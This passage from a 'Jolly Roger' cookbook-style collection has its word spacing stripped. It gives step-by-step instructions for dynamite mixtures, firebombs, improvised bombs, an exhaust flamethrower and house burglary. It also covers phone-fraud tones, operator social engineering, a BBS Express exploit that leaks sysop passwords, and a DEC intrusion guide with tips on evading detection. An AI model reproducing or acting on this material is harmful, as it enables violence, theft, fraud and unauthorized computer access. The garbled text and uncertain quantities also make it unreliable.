Yourkitisnowcomplete! >< I(CONTACTS)I II I(BATTERY) I II I(COIL)I /////// / /I /I /I (SWITCH)II II I(BATTERY) I(PACK) I II II II * (SOLARIGNITER) 52.HowtoStartAConferencew/o2600hzorMFbyTheJollyRoger Thismethodofstartingtheconf.Dependsonyourabilitytobullshitthe operatorintodialinganumberwhichcanonlybereachedwithanoperator'sMF tones.Whenbullshittingtheoperatorrememberoperator'sarenothiredto thinkbuttodo. Hereisastepbystepwaytotheconf.: Calltheoperatorthroughapbxorextender,youcouldjustcalloneThrough yourlinebutIwouldn'trecommendit. Saytotheoperator:TSPSmaintenanceengineer,ringforwardto213+080+1100, positionrelease,thankyou.(shewillprobablyaskyouforthenumberagain) Definitions: Ringforwardinstructshertodialthenumber. Positionreleaseinstructshertoreleasethetrunkaftershehasdialedthe number. +remembertosay213plus080plus1100. 3.Whenyouareconnectedwiththeconf.Youwillhereawhistleblowtwiceand arecordingaskingyouforyouroperatornumber.Dialinanyfivedigitsandhit thepoundssignacoupleoftimes.Simplydialinthenumberofthebillingline ect.Whentherecordingaskforit.Wheninthecontrolmodeoftheconf.Hit '6'totransfercontrol.Hit'001'toreenterthenumberofconferee'sandtime amountwhichyougavewhenyoustaredtheconf.Rememberthesizecanbefrom2 59conferee's.Ihavenotfoundoutthe'lengths'limits.

53.HowtoMakeDynamitebyTheJollyRoger Dynamiteisnothingmorethanjustnitroglycerinandastabilizingagenttomake itmuchsafertouse.Thenumbersarepercentages,besuretomixthese

carefullyandbesuretousetheexactamounts.Thesepercentagesareinweight ratio,notvolume. Number Ingredients Amount 1st Nitroglycerin 32% SodiumNitrate 28% Woodmeal 10% AmmoniumOxalate 29% Guncotton 1% 2nd Nitroglycerin 24% PotassiumNitrate 9% SodiumNitrate 56% Woodmeal 9% AmmoniumOxalate 2% 3rd Nitroglycerin 35?% PotassiumNitrate 44?% Woodmeal 6% Guncotton 2?% Vaseline 5?% PowderedCharcoal 6% 4th Nitroglycerin 25% PotassiumNitrate 26% Woodmeal 34% BariumNitrate 5% Starch 10% 5th Nitroglycerin 57% PotassiumNitrate 19% Woodmeal 9% AmmoniumOxalate 12% Guncotton 3% 6th Nitroglycerin 18% SodiumNitrate 70% Woodmeal 5?% PotassiumChloride 4?% Chalk 2% 7th Nitroglycerin 26% Woodmeal 40% BariumNitrate 32% SodiumCarbonate 2% 8th Nitroglycerin 44% Woodmeal 12% AnhydrousSodiumSulfate 9th Nitroglycerin 24% PotassiumNitrate 32?% Woodmeal 33?% AmmoniumOxalate 10% 10th Nitroglycerin 26% PotassiumNitrate 33% Woodmeal 41% 11th Nitroglycerin 15% SodiumNitrate 62.9% Woodmeal 21.2% SodiumCarbonate .9% 12th Nitroglycerin 35% SodiumNitrate 27% Woodmeal 10% AmmoniumOxalate 1% 13th Nitroglycerin 32% PotassiumNitrate 27% Woodmeal 10% AmmoniumOxalate 30% Guncotton 1%

44%

14th 15th 16th 17th 18th 19th

Nitroglycerin 33% Woodmeal 10.3% AmmoniumOxalate 29% Guncotton .7% PotassiumPerchloride 27% Nitroglycerin 40% SodiumNitrate 45% Woodmeal 15% Nitroglycerin 47% Starch 50% Guncotton 3% Nitroglycerin 30% SodiumNitrate 22.3% Woodmeal 40?% PotassiumChloride 7.2% Nitroglycerin 50% SodiumNitrate 32.6% Woodmeal 17% AmmoniumOxalate .4% Nitroglycerin 23% PotassiumNitrate 27?% Woodmeal 37% AmmoniumOxalate 8% BariumNitrate 4% CalciumCarbonate ?%

Ifyoucan'tseemtogetoneormoreoftheingredientstryanotherone.Ifyou stillcan't,youcanalwaysbuysmallamountsfromyourschool,ormaybefrom variouschemicalcompanies.Whenyoudothat,besuretosayaslittleas possible,ifduringtheschoolyear,andtheyask,sayit'sforaexperimentfor school. 54.AutoExhaustFlameThrowerbyTheJollyRoger Forthisone,allyouneedisacar,asparkplug,ignitionwireandaswitch. Installthesparkplugintothelastfourorfiveinchesofthetailpipeby drillingaholethattheplugcanscrewintoeasily.Attachthewire(thisis regularinsulatedwire)toonesideoftheswitchandtothesparkplug.The othersideoftheswitchisattachedtothepositiveterminalonthebattery. Withthecarrunning,simplyhittheswitchandwatchtheflamesfly!!!Againbe carefulthatnooneisbehindyou!Ihaveseensomeoftheseflamesgo20 feet!!! 55.BreakingintoBBSExpressbyTheJollyRoger IfyouhavehighenoughaccessonanyBBSExpressBBSyoucangettheSysop's passwordwithoutanyproblemsandbeabletologonashimanddowhateveryou like.DownloadthePassfile,deletethewholeBBS,anything.Itsallamatter ofuploadingatextfileanddownloadingitfromtheBBS.Youmusthavehigh enoughaccesstoseenewuploadstodothis.Ifyoucanseeafileyoujust uploadedyouhavetheabilitytobreakintotheBBSinafeweasysteps.Whyam ItellingeveryonethiswhenIrunBBSExpressmyself?Wellthereisonewayto stopthisfromhappeningandIwantotherSysopstobeawareofitandnothave ithappentothem.BreakinginisallbasedontheMENUfunctionofBBSExpress. Expresswillletyoucreateamenutodisplaydifferenttextfilesbyputting thewordMENUatthetopofanytextfileandstatingwhatfilesaretobe displayed.ButduetoamajorscrewupbyMr.LedbetteryoucanusethisMENU optiontodisplaytheUSERLOGandtheSysop'sPasswordsoranythingelseyou like.IwillshowyouhowtogettheSysop'spassandthereforelogonasthe Sysop.BBsExpressSysop'shave2passwords.Onelikeeveryoneelsegetsinthe formofX1XXX,andaSecondarypasswordtomakeithardertohackouttheSysops

pass.TheSecondarypassisfoundinafilecalledSYSDATA.DAT.Thisfilemust beondrive1andisthereforeeasytoget. AllyouhavetodoisuploadthissimpleTextfile: MENU 1 D1:SYSDATA.DAT Ripofftime! AfteryouuploadthisfileyoudownloaditnonXmodem.StupidExpressthinks itisdisplayingamenuandyouwillseethis: Ripofftime! Selection[0]: Justhit1andExpresswilldisplaytheSYSDATA.DATfile.OPPASSiswherethe Sysop'sSecondarypasswillbe.D1:USERLOG.DATiswhereyouwillfindthename andDrivenumberoftheUSERLOG.DATfile.TheSysopmighthaverenamedthisfile orputitinaSubdirectoryorevenonadifferentdrive.IWillAssumeheleft itasD1:USERLOG.DAT.Theotherpartsofthisfiletellyouwherethe.HLP screensareandwheretheLOGissavedandalltheDownloadpathnames. NowtogettheSysop'sprimarypassyouuploadatextfilelikethis: MENU 1 D1:USERLOG.DAT BreakingintoBedwetter'sBBS AgainyouthendownloadthisfilenonXmodemandyouwillsee: BreakingintoBedwetter'sBBS Selection[0]: Youthenhit1andthelongUSERLOG.DATfilecomesflyingatyou.TheSysopis thefirstentryinthisverylongfilesoitiseasy.Youwillsee: SYSOP'SNAMEX1XXX Youshouldnowhavehis2passwords. ThereisonlyoneeasywayoutofthisthatIcanthinkof,andthatistomake allnewuploadsgotoSYSOPlevel(Level9)accessonly.Thiswaynobodycan pulloffwhatIjustexplained.IfeelthisisamajorBugonMr.Ledbetter's part.Ijustdon'tknowwhynoonehadthoughtofitbefore.Iwouldliketo givecredittoRedlineforthemessageheleftonModemHelltellingaboutthis problem,andalsotoUnkaforhisideasandinputaboutcorrectingit. 56.FirebombsbyTheJollyRoger Mostfirebombsaresimplygasolinefilledbottleswithafuelsoakedraginthe mouth(thebottle'smouth,notyours).TheoriginalMolotovcocktail,andstill aboutthebest,wasamixtureofonepartgasolineandonepartmotoroil.The oilhelpsittoclingtowhatitsplatterson.Someuseonepartroofingtarand onepartgasoline.Firebombshavebeenfoundwhichweremadebypouringmelted waxintogasoline.

57.FuseIgnitionBombbyTheJollyRoger Afourstrandhomemadefuseisusedforthis.Itburnslikefury.Itisheld downandconcealedbyastripofbenttincutfromacan.Theexposedendofthe fuseisdippedintotheflareigniter.Tousethisone,youlightthefuseand holdthefirebombuntilthefusehasburnedoutofsightunderthetin.Then throwitandwhenitbreaks,theburningfusewillignitethecontents. 58.GenericBombbyTheJollyRoger 1. Acquireaglasscontainer. 2. Putinafewdropsofgasoline. 3. Capthetop. 4. Nowturnthecontaineraroundtocoattheinnersurfacesandthen evaporates. 5. Addafewdropsofpotassiumpermanganate(Getthisstufffromasnake bitekit) 6. Thebombisdetonatedbythrowingagainstasolidobject. Afterthrowingthisthing,runlikehell.Thisthingpacksabout?stickof dynamite. 59.GreenBoxPlansbytheJollyRoger Payingtheinitialrateinordertousearedbox(oncertainfortresses)lefta sourtasteinmanyredboxersmouths,thusthegreenboxwasinvented.Thegreen boxgeneratesusefultonessuchasCOINCOLLECT,COINRETURN,ANDRINGBACK. ThesearethetonesthatACTSortheTSPSoperatorwouldsendtotheCOwhen appropriate.Unfortunately,thegreenboxcannotbeusedatthefortressstation butmustbeusedbytheCALLEDparty. Herearethetones: COINCOLLECT700+1100hz COINRETURN1100+1700hz RINGBACK700+1700hz Beforethecalledpartysendsanyofthesetones,anoperatorreleasesignal shouldbesenttoalerttheMFdetectorsattheCO.Thiscanbedonebysending 900hz+1500hzorasingle2600wink(90ms.)Alsodonotforgetthatthe initialrateiscollectedshortlybeforethe3minuteperiodisup. Incidentally,oncetheaboveMFtonesforcollectingandreturningcoinsreach theCO,theyareconvertedintoanappropriateDCpulse(130voltsforreturn and+130forcollect).Thispulseisthensentdownthetiptothefortress. Thiscausesthecoinrelaytoeitherreturnorcollectthecoins.Thealleged "Tnetwork"takesadvantageofthisinformation.Whenapulseforcoincollect (+130VDC)issentdowntheline,itmustbegroundedsomewhere.Thisisusually theyelloworblackwire.Thus,ifthewiresareexposed,thesewirescanbecut topreventthepulsefrombeinggrounded.Whenthethreeminuteinitialperiod isalmostup,makesurethattheblackandyellowwiresaresevered,thenhang up,waitabout15secondsincaseofasecondpulse,reconnectthewires,pick upthephone,andifallgoeswell,itshouldbe"JACKPOT"time. 60.PortableGrenadeLauncherbyTheJollyRoger Ifyouhaveabow,thisoneisforyou.Removetheferrulefromanaluminum arrow,andfillthearrowwithblackpowder(IusegradeFFFF,itburnseasy)and thenglueashotshellprimerintotheholeleftwheretheferrulewent.Next, glueaBBontheprimer,andyouarereadytogo!Makesurenooneisnearby.... Littleshredsofaluminumgoallovertheplace!!

61.HackingTutorialbyTheJollyRoger Whatishacking? AccordingtopopularbeliefthetermhackerandhackingwasfoundedatMITit comesfromtherootofahackwriter,someonewhokeeps"hacking"atthe typewriteruntilhefinishesthestory.Acomputerhackerwouldbehackingat thekeyboardorpasswordworks. Whatyouneed: Tohackyouneedacomputerequippedwithamodem(adevicethatletsyou transmitdataoverphonelines)whichshouldcostyoufrom$100to$1200. Howdoyouhack? Hackingrequirestwothings: 1. Thephonenumber. 2. Answertoidentityelements. Howdoyoufindthephonenumber? Therearethreebasicwaystofindacomputersphonenumber: 1. Scanning 2. Directory 3. Insideinfo Whatisscanning? Scanningistheprocessofhavingacomputersearchforacarriertone.For example,thecomputerwouldstartat(800)1111111andwaitforcarrierif thereisnoneitwillgoonto1111112etc.Ifthereisacarrieritwill recorditforfutureuseandcontinuelookingformore. Whatisdirectoryassistance? Thiswaycanonlybeusedifyouknowwhereyourtargetcomputeris.Forthis examplesayitisinmenlopark,CAandthecompanynameisSri. 1. Dial411(or4155551212) 2. Say"Menlopark" 3. Say"Sri" 4. Writedownnumber 5. Askifthereareanymorenumbers 6. Ifsowritethemdown. 7. Hanguponoperator 8. Dialallnumbersyouweregiven 9. Listenforcarriertone 10. Ifyouhearcarriertonewritedownnumber,callitonyourmodemandyour settohack! 62.TheBasicsofHackingIIbyTheJollyRoger Basicstoknowbeforedoinganything,essentialtoyourcontinuingcareerasone oftheeliteinthecountry...Thisarticle,"Theintroductiontotheworldof hacking."ismeanttohelpyoubytellingyouhownottogetcaught,whatnotto doonacomputersystem,whattypeofequipmentshouldIknowaboutnow,and justalittleonthehistory,pastpresentfuture,ofthehacker. Welcometotheworldofhacking!We,thepeoplewholiveoutsideofthenormal rules,andhavebeenscornedandevenarrestedbythosefromthe'civilized world',arebecomingscarcereveryday.Thisisduetothegreaterfearofwhat agoodhacker(skillwise,nomoraljudgmentshere)candonowadays,thus causingantihackersentimentinthemasses.Also,fewhackersseemtoactually knowaboutthecomputersystemstheyhack,orwhatequipmenttheywillruninto

onthefrontend,orwhattheycoulddowrongonasystemtoalertthe'higher' authoritieswhomonitorthesystem.Thisarticleisintendedtotellyouabout somethingsnottodo,evenbeforeyougetonthesystem.Iwilltellyouabout thenewwaveoffrontendsecuritydevicesthatarebeginningtobeusedon computers.Iwillattempttoinstillinyouasecondidentity,tobebroughtup attimeofgreatneed,topullyououtoftrouble.And,bytheway,Itakeno, repeat,no,responsibilityforwhatwesayinthisandtheforthcomingarticles. Enoughofthebullshit,ontothefun:afterloggingonyourfavoritebbs,you seeonthehighaccessboardaphonenumber!Itsaysit'sagreatsystemto "fuckaroundwith!"Thismaybetrue,buthowmanyotherpeoplearegoingto callthesamenumber?So:trytoavoidcallinganumbergiventothepublic. Thisisbecausethereareatleasteveryotherusercalling,andhowmanyother boardswillthatnumberspreadto?Ifyoucallanumberfar,faraway,andyou planongoingthroughanextenderorareseller,don'tkeepcallingthesame accessnumber(I.E.Asyouwouldifyouhadahackerrunning),thislooksvery suspiciousandcanmakelifemiserablewhenthephonebillcomesinthemail. Mostcitieshaveavarietyofaccessnumbersandservices,souseasmanyasyou can.Nevertrustachangeinthesystem...The414's,theassholes,werecaught forthisreason:whenoneofthemconnectedtothesystem,therewasnothing goodthere.Thenexttime,therewasatrekgamestuckrightintheirway! Theyproceededtoplaysaidgamefortwo,saytwoandahalfhours,while telenetwastracingthem!Nicejob,don'tyouthink?Ifanythinglooks suspicious,dropthelineimmediately!!Asin,yesterday!!Thepointwe're tryingtogetacrossis:ifyouusealittlecommonsense,youwon'tgetbusted. Letthelittlekidswhoaren'tsmartenoughtorecognizeatrapgetbusted,it willtaketheheatoffoftherealhackers.Now,let'ssayyougetonacomputer system...Itlooksgreat,checksout,everythingseemsfine.OK,nowiswhenit getsmoredangerous.Youhavetoknowthecomputersystemtoknowwhatnotto do.Basically,keepawayfromanycommandsomething,copyanewfileintothe account,orwhatever!Alwaysleavetheaccountinthesamestatusyouloggedin with.Change*nothing*...Ifitisn'tanaccountwithpriv's,thendon'ttry anycommandsthatrequirethem!All,yesall,systemsaregoingtobekeeping logfilesofwhatusersaredoing,andthatwillshowup.Itisjustlike droppingatroublecardinanESSsystem,aftersendingthatniceoperatora prettytone.Spendnoexcessiveamountsoftimeontheaccountinonestretch. Keepyourcallingtotheverylatenightifpossible,orduringbusinesshours (believeitornot!).Itsohappensthattherearemoreusersonduring businesshours,anditisverydifficulttoreadalogfilewith60usersdoing manycommandseveryminute.Trytoavoidsystemswhereeveryoneknowseach other,don'ttrytobluff.Andaboveall:neveractlikeyouownthesystem,or arethebestthereis.Theyalwaysgrabthepeoplewho'sheadsswell...Thereis someveryinterestingfrontendequipmentaroundnowadays,butfirstlet's defineterms...Byfrontend,wemeananydevicethatyoumustpassthroughto getattherealcomputer.Therearedevicesthataremadetodefeathacker programs,andjustplainoldmultiplexers.Todefeathackerprograms,thereare nowdevicesthatpickupthephoneandjustsitthere...Thismeansthatyour devicegetsnocarrier,thusyouthinkthereisn'tacomputerontheotherend. Theonlywayarounditistodetectwhenitwaspickedup.Ifitpicksupafter thesamenumberring,thenyouknowitisahackerdefeater.Thesedevicestake amultidigitcodetoletyouintothesystem.Someare,infact,quite sophisticatedtothepointwhereitwillalsolimittheusername'sdown,so onlyonenameorsetofnamescanbevalidloginsaftertheyinputthecode... Otherdevicesinputanumbercode,andthentheydialbackapreprogrammed numberforthatcode.Thesesystemsarebesttoleavealone,becausetheyknow someoneisplayingwiththeirphone.Youmaythink"butI'lljustreprogramthe dialback."Thinkagain,howstupidthatis...Thentheyhaveyournumber,ora testloopifyouwerejustalittlesmarter.Ifit'syournumber,theyhaveyour balls(ifmale...),ifitsaloop,thenyouarescrewedagain,sincethoseloops are*monitored*.Asformultiplexers...Whataplexerissupposedtodoisthis: Thesystemcanacceptmultipleusers.Wehavetotimeshare,sowe'llletthe frontendprocessordoit...Well,thisiswhatamultiplexerdoes.Usually theywillaskforsomethinglike"enterclass"or"line:".Usuallyitis

programmedforadoubledigitnumber,orafourtofiveletterword.Thereare usuallyafewsetsofnumbersitaccepts,butthosenumbersalsosetyour 300/1200/2400bauddatatype.Thesemultiplexersareinconvenientatbest,so nottoworry.Alittleaboutthehistoryofhacking:hacking,bymydefinition, meansagreatknowledgeofsomespecialarea.Doctorsandlawyersarehackersof asort,bythisdefinition.Butmostoften,itisbeingusedinthecomputer context,andthuswehaveadefinitionof"anyonewhohasagreatamountof computerortelecommunicationsknowledge."Youarenotahackerbecauseyou havealistofcodes...Hacking,bymydefinition,hasthenbeenaroundonly about15years.Itstarted,whereelsebut,MITandcollegeswheretheyhad computerscienceorelectricalengineeringdepartments.Hackershavecreated someofthebestcomputerlanguages,themostawesomeoperatingsystems,and evengoneontomakemillions.Hackingusedtohaveagoodname,whenwecould honestlysay"weknowwhatwearedoing".Nowitmeans(inthepubliceye):the 414's,RonAustin,theNASAhackers,thearpanethackers...Allthepeoplewho havebeencaught,havedonedamage,andarenowgoingtohavetofacefinesand sentences.Thuswecomepastthemoralisticcrap,andtoourpurpose:educate thehackercommunity,returntothedayswhenpeopleactuallyknewsomething... 63.HackingDEC'sbyTheJollyRoger Inthisarticleyouwilllearnhowtologintodec's,loggingout,andallthe funstufftodoinbetween.Allofthisinformationisbasedonastandarddec system.Sincetherearedecsystems10and20,andIfavor,thedec20,there willbemoreinfoontheminthisarticle.Itjustsohappensthatthedec20 isalsothemorecommonofthetwo,andisusedbymuchmoreinterestingpeople (ifyouknowwhatImean...)OK,thefirstthingyouwanttodowhenyouare receivingcarrierfromadecsystemistofindouttheformatofloginnames. Youcandothisbylookingatwhoisonthesystem. Dec=>`(the'exec'levelprompt) you=>sy sy:shortforsy(stat)andshowsyouthesystemstatus. Youshouldseetheformatofloginnames.Asystatusuallycomesupinthis form: JobLineProgramUser Job:Thejobnumber(notimportantunlessyouwanttologthemofflater) Line:Whatlinetheyareon(usedtotalktothem...)Thesearebothtwoor threedigitnumbers. Program:Whatprogramaretheyrunningunder?Ifitsays'exec'theyaren't doinganythingatall... User:ahhhahhhh!Thisistheusernametheyareloggedinunder...Copythe format,andhackyourselfoutaworkingcode...Loginformatisassuch: dec=>` you=>loginusernamepassword Usernameistheusernameintheformatyousawaboveinthesystat.Afteryou hitthespaceafteryourusername,itwillstopechoingcharactersbacktoyour screen.Thisisthepasswordyouaretypingin...Remember,peopleusuallyuse theirname,theirdog'sname,thenameofafavoritecharacterinabook,or somethinglikethis.Afewcleverpeoplehaveitsettoakeycluster(qwertyor asdfg).Passwordscanbefrom1to8characterslong,anythingafterthatis ignored.Youarefinallyin...Itwouldbenicetohavealittlehelp,wouldn't it?Justtypea?Orthewordhelp,anditwillgiveyouawholelistof topics...Somehandycharactersforyoutoknowwouldbethecontrolkeys, wouldn'tit?Backspaceonadec20isrubwhichis255onyourASCIIchart.On thedec10itiscontrolH.Toabortalonglistingoraprogram,controlC

worksfine.UseControlOtostoplongoutputtotheterminal.Thisishandy whenplayingagame,butyoudon'twanttocontrolCout.ControlTforthe time.Controluwillkillthewholelineyouaretypingatthemoment.Youmay accidentallyrunaprogramwheretheonlywayoutisacontrolX,sokeepthat inreserve.Controlstostoplisting,controlQtocontinueonbothsystems.Is yourterminalhavingtrouble??Like,itpausesfornoreason,oritdoesn't backspaceright?Thisisbecausebothsystemssupportmanyterminals,andyou haven'ttolditwhatyoursisyet...YouareusingaVT05soyouneedtotellit youareone. Dec=>` you=>informationterminal or You=>info (Thisshowsyouwhatyourterminalissetupas.) Dec=>allsortsofshit,thenthe` you=>settervt05 (ThissetsyourterminaltypetoVT05.) Nowlet'sseewhatisintheaccount(hereafterabbreviatedacct.)thatyou havehackedonto.Say: =>dir (Shortfordirectory.) Itshowsyouwhattheuserofthecodehassavetothedisk.Thereshouldbea formatlikethis:xxxxx.Oooxxxxxisthefilename,from1to20characterslong. Oooisthefiletype,oneof:exe,txt,dat,bas,cmdandafewothersthat aresystemdependant.Exeisacompiledprogramthatcanberun(justbytyping itsnameatthe`) Txtisatextfile,whichyoucanseebytyping: =>typexxxxx.Txt Donottryto: =>typexxxxx.Exe (Thisisverybadforyourterminalandwilltellyouabsolutelynothing.) Datisdatatheyhavesaved. Basisabasicprogram,youcanhaveittypedoutforyou. Cmdisacommandtypefile,alittletoocomplicatedtogointohere.Try: =>takexxxxx.Cmd Bytheway,thereareotherusersouttherewhomayhavefilesyoucanuse. (Gee,whyelseamIhere?) =>dir<*.*>(Dec20) =>dir[*,*](Dec10) *isawildcard,andwillallowyoutoaccessthefilesonotheraccountsifthe userhasitsetforpublicaccess.Ifitisn'tsetforpublicaccess,thenyou won'tseeit.Torunthatprogram: dec=>` you=>usernameprogramname Usernameisthedirectoryyousawthefilelistedunder,andfilenamewaswhat elsebutthefilename?**Youarenotalone**remember,yousaid(atthe verystart)syshortforsystat,andhowwesaidthisshowedtheotheruserson thesystem?Well,youcantalktothem,oratleastsendamessagetoanyone youseelistedinasystat.Youcandothisby: dec=>theuserlist(fromyoursystat) you=>talkusername(Dec20)

sendusername(Dec10) Talkallowsyouandthemimmediatetransmissionofwhateveryou/theytypetobe senttotheother.Sendonlyallowyouonemessagetobesent,andsend,they willsendbacktoyou,withtalkyoucanjustkeepgoing.Bytheway,youmaybe noticingwiththetalkcommandthatwhatyoutypeisstillacteduponbythe parser(controlprogram).Toavoidtheconstanterrormessagestypeeither: you=>;yourmessage you=>remyourmessage thesemicolontellstheparserthatwhatfollowsisjustacomment.Remis shortfor'remark'andignoresyoufromthenonuntilyoutypeacontrolZor controlC,atwhichpointitputsyoubackintheexecmode.Tobreakthe connectionfromatalkcommandtype: you=>breakpriv's: Ifyouhappentohaveprivs,youcandoallsortsofthings.Firstofall,you havetoactivatethoseprivs. You=>enable Thisgivesyoua$prompt,andallowsyoutodothis:whateveryoucandoto yourowndirectoryyoucannowdotoanyotherdirectory.Tocreateanewacct. Usingyourprivs,justtype: =>buildusername Ifusernameisold,youcaneditit,ifitisnew,youcandefineittobe whateveryouwish.Privacymeansnothingtoauserwithprivs.Bytheway, therearevariouslevelsofprivs:operator,wheel,cia.Wheelisthemost powerful,beingthathecanloginfromanywhereandhavehispowers.Operators havetheirpowerbecausetheyareataspecialterminalallowingthemtheprivs. Ciaisshortfor'confidentialinformationaccess',whichallowsyoualowlevel amountofprivs.Nottoworrythough,sinceyoucanreadthesystemlogfile, whichalsohasthepasswordstoalltheotheraccounts. Todeactivateyourprivs,type: you=>disable whenyouhaveplayedyourgreedyheartout,youcanfinallyleavethe systemwiththecommand: =>logout Thislogsthejobyouareusingoffthesystem(theremaybevarientsofthis suchaskjob,orkilljob.) 64.HarmlessBombsbyTheJollyRoger Toallthosewhodonotwishtoinflictbodilydamageontheirvictimsbutonly terror.Theseareweaponsthatshouldbeusedfromhighplaces. 1. TheFlourBomb Takeawetpapertowelandpouragivenamountofbakingflourinthe center.Thenwrapitupandputonarubberbandtokeepittogether.When thrownitwillflywellbutwhenithits,itcoversthevictimwiththeflower orcausesabigpuffofflourwhichwillputthevictiminterrorsinceasfar astheyareconcerned,somestrangewhitepowderisalloverthem.Thisisa cheapmethodofterrorandforonlythecostofarollofpapertowelsandabag

offlouryouandyourfriendscanhaveloadsoffunwatchingpeoplefleein panic. 2. SmokeBombProjectile Allyouneedisabunchofthoselittleroundsmokebombsandawrist rocketoranyslingshot.Shootthesmokebombsandwatchtheterrorsincethey thinkitwillblowup! 3. RottenEggs(Goodones) Takesomeeggsandgetasharpneedleandpokeasmallholeinthetopof eachone.Thenletthemsitinawarmplaceforaboutaweek.Thenyou'vegota bunchofrotteneggsthatwillonlysmellwhentheyhit. 4. GlowintheDarkTerror Takeoneofthosetubesofglowinthedarkstuffandpourthestuffon whateveryouwanttothrowandwhenitgetsonthevictim,theythinkit'ssome deadlychemicaloraradioactivesubstancesotheyrunintotalpanic.This worksespeciallywellwithflowerbombssinceagummy,glowingsubstancegets alloverthevictim. 5. FizzlingPanic Takeabaggyofawaterbakingsodasolutionandsealit.(Makesurethereisno airinitsincethesolutionwillformagasandyoudon'twantittopopon you.)Thenputitinabiggerplasticbagandfillitwithvinegarandsealit. Whenthrown,thetwosubstanceswillmixandcauseaviolentlybubbling substancetogoalloverthevictim. 65.BreakingIntoHousesbyTheJollyRoger OkayYouNeed: 1. TearGasorMace 2. ABB/PelletGun 3. AnIcePick 4. ThickGloves WhatYouDoIs: 1. 2. 3. 4. 5. 6. 7. 8. 9. 10. case. 11. Callthehouse,orringdoorbell,tofindoutifthey'rehome. Ifthey'renothomethen... Jumpoverthefenceorwalkthroughgate(whatever). Ifyouseeadoggivehimthemaceorteargas. Putthegloveson!!!!!!! ShoottheBBgunslightlyabovethewindowlocks. Pushtheicepickthroughthehole(madebytheBBgun). Enterwindow. FIRST...FindtheLIVINGROOM.(there'reneatthingsthere!). Gotothebedroomtogetapillowcase.Putthegoodiesinthepillow Getout<*FAST!*>

Notes:Youshouldhavecertaintargetsworkedout(likecomputers,Radios,Ect.) Also<*NEVER*>Stealfromyourownneighborhood.Ifyouthinktheyhavean alarm...<*FORGETIT!*>. 66.AGuidetoHypnotismbyTheJollyRoger Whathypnotismis? Hypnotism,contrarytocommonbelief,ismerelystatewhenyourmindandbody areinastateofrelaxationandyourmindisopentopositive,orcleverly wordednegative,influences.Itisnotatrancewhereyou: ? Aretotallyinfluenceable. ? Cannotlie. ? Asleepwhichyoucannotwakeupfromwithouthelp. Thismaybringdownyourhopesomewhat,but,hypnotismisapowerfulforself

help,and/ormischief. Yoursubconsciousmind Beforegoinginfurther,I'dliketostatethathypnotismnotonlyisgreatin thewaythatitrelaxesyouandgetsyou(inthelongrun)whatyouwant,but alsothatittapsaforceofincrediblepower,believeitornot,thispoweris yoursubconsciousmind.Thesubconsciousmindalwaysknowswhatisgoingonwith everypartofyourbody,everymomentoftheday.Itprotectsyoufromnegative influences,andretainsthepowertoslowyourheartbeatdownandstufflike that.Thesubconsciousmindholdsjustaboutalltheinfoyouwouldliketoknow Aboutyourself,or,inthiscase,thepersonyouwillbehypnotizing.Thereare manywaystotalktoyoursubconsciousandhaveittalkbacktoyou.Onewayis theoujaboard,noitsnotaspirit,merelythemindsofthosewhoareusingit. Another,whichIwilldiscusshere,isthependulummethod.OK,hereishowit goes.First,getaringorawasherandtieittoathreadalittlelongerthan halfofyourforearm.Now,takeasheetofpaperanddrawabigcircleinit. Inthebigcircleyoumustnowdrawacrosshair(abig+).Now,putthesheet ofpaperonatable.Next,holdthethreadwiththeringorwasheronitand placeit(holdingthethreadsothattheringis1inchabovethepaper swinging)inthemiddleofthecrosshair.Now,swingthethreadsothewasher goesupanddown,saytoyourselftheword"Yes"now,doitsidetosideandsay theword"no".Doitcounterclockwiseandsay"Idon'tknow".Andlastly,doit clockwiseandsay"Idon'twanttosay."Now,withthethreadbackinthemiddle ofthecrosshair,askyourselfquestionsandwaitforthependulumtoswingin thedirectionfortheanswer.(yes,no,Idon'tknoworIdon'twanttosay...). Soon,toyouramazement,itwillbeansweringquestionslikeanything...Letthe pendulumanswer,don'ttry..Whenyoutryyouwillnevergetananswer.Letthe answercometoyou. Howtoinducehypnotism Nowthatyouknowhowtotalktoyoursubconsciousmind,Iwillnowtellyouhow toguidesomeoneintohypnosis.NotethatIsaidguide,youcannever,hypnotize someone,theymustbewilling.OK,thesubjectmustbelyingorsittingina comfortableposition,relaxed,andatatimewhenthingsaren'tgoingtobe interrupted.Tellthemthefollowingorsomethingclosetoit,inapeaceful, monotonoustone(notacommandingtoneofvoice) Note:Lightacandleandplaceitsomewherewhereitcanbeeasilyseen. "Takeadeepbreaththroughyournoseandholditinforacountof8.Now, throughyourmouth,exhalecompletelyandslowly.Continuedbreathinglong, deep,breathsthroughyournoseandexhalingthroughyourmouth.Tenseupall yourmusclesverytight,now,countingfromtentoone,releasethemslowly,you willfindthemveryrelaxed.Now,lookatthecandle,asyoulookatit,with everybreathandpassingmoment,youarefeelingincreasinglymoreandmore peacefulandrelaxed.Thecandlesflameispeacefulandbright.Asyoulookat itIwillcountfrom100down,asacount,youreyeswillbecomemoreandmore relaxed,gettingmoreandmoretiredwitheachpassingmoment."Now,countdown from100,aboutevery10numberssay"WhenIreachxxyoureyes(oryouwill findyoureyes)arebecomingmoreandmoretired."Tellthemtheymayclose theireyeswhenevertheyfeellikeit.Ifthepersonseyesarestillopenwhen yougetto50theninsteadofsaying"youreyeswill.."Say"youreyesare...". Whentheireyesareshutsaythefollowing.Asyoulie(orsit)herewithyour eyescomfortablycloseyoufindyourselfrelaxingmoreandmorewitheachmoment andbreath.Therelaxationfeelspleasantandblissfulso,youhappilygiveway tothiswonderfulfeeling.Imagineyourselfonacloud,restingpeacefully,with aslightbreezecaressingyourbody.Atinglingsensationbeginstoworkits way,withinandwithoutyourtoes,itslowlymovesupyourfeet,makingthem warm,heavyandrelaxed.Thecloudissoftandsupportsyourbodywithitssoft texture,thesceneispeacefulandabsorbing,thepeacefulnessabsorbsyou completely.Thetinglinggentlyandslowlymovesupyourlegs,relaxingthem. Makingthemwarmandheavy.Therelaxationfeelsverygood,itfeelssogoodto

